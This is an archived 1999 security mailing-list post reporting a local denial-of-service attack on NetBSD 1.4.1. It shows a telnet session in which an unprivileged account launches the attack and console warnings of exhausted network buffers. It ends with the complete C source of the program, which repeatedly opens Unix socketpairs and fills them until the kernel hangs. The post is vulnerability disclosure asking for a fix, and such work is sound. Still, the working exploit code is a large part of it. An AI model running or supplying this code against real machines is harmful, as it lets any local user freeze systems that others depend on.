Subject: NetBSD 1.4.1 local DoS
To: None <tech-security@netbsd.org>
From: NetBSD Freak <netbsd@SDF.lonestar.org>
List: tech-security
Date: 09/01/1999 12:33:42
by redmail.netbsd.org with SMTP; 1 Sep 1999 17:29:07 -0000
Date: Wed, 1 Sep 1999 12:33:42 -0500 (CDT)
From: NetBSD Freak <netbsd@SDF.lonestar.org>
To: tech-security@netbsd.org
Subject: NetBSD 1.4.1 local DoS
Message-ID: <Pine.LNX.4.10.9909011229200.24467-100000@sdf.lonestar.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
L. Sassaman posted a small c-script to bugtraq which is able to lock
FreeBSD 2.2.6, 2.2.8, and 3.2.x.
I tried this on my NetBSD 1.4.1 (i386) box and it worked too. After 4
minutes the machine was locked up completely, console was locked and no
telnet or ssh connection was possible.
Here's a log of the DoS (i used the falken account to show that even the
lowest user is able to perform this DoS).
---begin telnetlog---
NetBSD/i386 (delta) (ttyp0)
login: falken
Password:
Copyright (c) 1996, 1997, 1998, 1999
The NetBSD Foundation, Inc. All rights reserved.
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
NetBSD 1.4.1 (GENERIC) #1: Tue Aug 10 00:03:09 MEST 1999
Welcome to NetBSD!
$ whoami;id
falken
uid=32766(falken) gid=31(guest) groups=31(guest)
$ ps axu
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
falken 303 1.0 1.5 292 228 p0 R+ 6:20PM 0:00.02 ps -axu
root 1 0.0 0.6 252 92 ?? Is 5:44PM 0:00.11 init
root 2 0.0 45.6 0 7284 ?? DL 5:44PM 0:00.28
(pagedaemon)
root 3 0.0 45.6 0 7284 ?? DL 5:44PM 0:00.13 (reaper)
root 141 0.0 1.8 96 288 ?? Ss 5:44PM 0:00.24 syslogd
root 145 0.0 0.0 52 4 ?? IWs 5:44PM 0:00.02 portmap -l
root 173 0.0 0.7 16 96 ?? Ss 5:44PM 0:00.49 update 30
root 0 0.0 45.6 0 7284 ?? DLs 5:44PM 0:00.02 (swapper)
root 178 0.0 2.1 76 336 ?? Is 5:44PM 0:00.10 inetd -l
root 180 0.0 0.0 304 4 ?? IWs 5:44PM 0:13.63
/usr/local/sbin/sshd1
root 287 0.0 5.7 496 900 ?? Is 6:18PM 0:00.04 sendmail:
accepting connections on port 25
root 289 0.0 4.0 132 640 ?? S 6:18PM 0:00.40 telnetd
falken 290 0.0 1.4 356 208 p0 Ss 6:18PM 0:00.31 -sh
root 175 0.0 3.1 276 488 ?? Is 5:44PM 0:00.25 cron
$ date
Wed Sep 1 18:21:35 CEST 1999
$ ./hangupbsd &
$
---end telnetlog---
---begin consolelog---
Sep 1 18:25:56 delta /netbsd: WARNING: mclpool limit reached; increase
NMBCLUSTERS
Sep 1 18:27:41 delta /netbsd: WARNING: mclpool limit reached; increase
NMBCLUSTERS
Sep 1 18:29:14 delta /netbsd: WARNING: mclpool limit reached; increase
NMBCLUSTERS
Sep 1 18:31:36 delta /netbsd: WARNING: mclpool limit reached; increase
NMBCLUSTERS
---end consolelog---
any ideas how to prevent/fix this ?
yours,
NetBSD Freak
netbsd@sdf.lonestar.org
DoS code by L. Sassaman (rabbi@QUICKIE.NET):
---begin c-script---
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
return(0);
}
---end c-script---
<eof>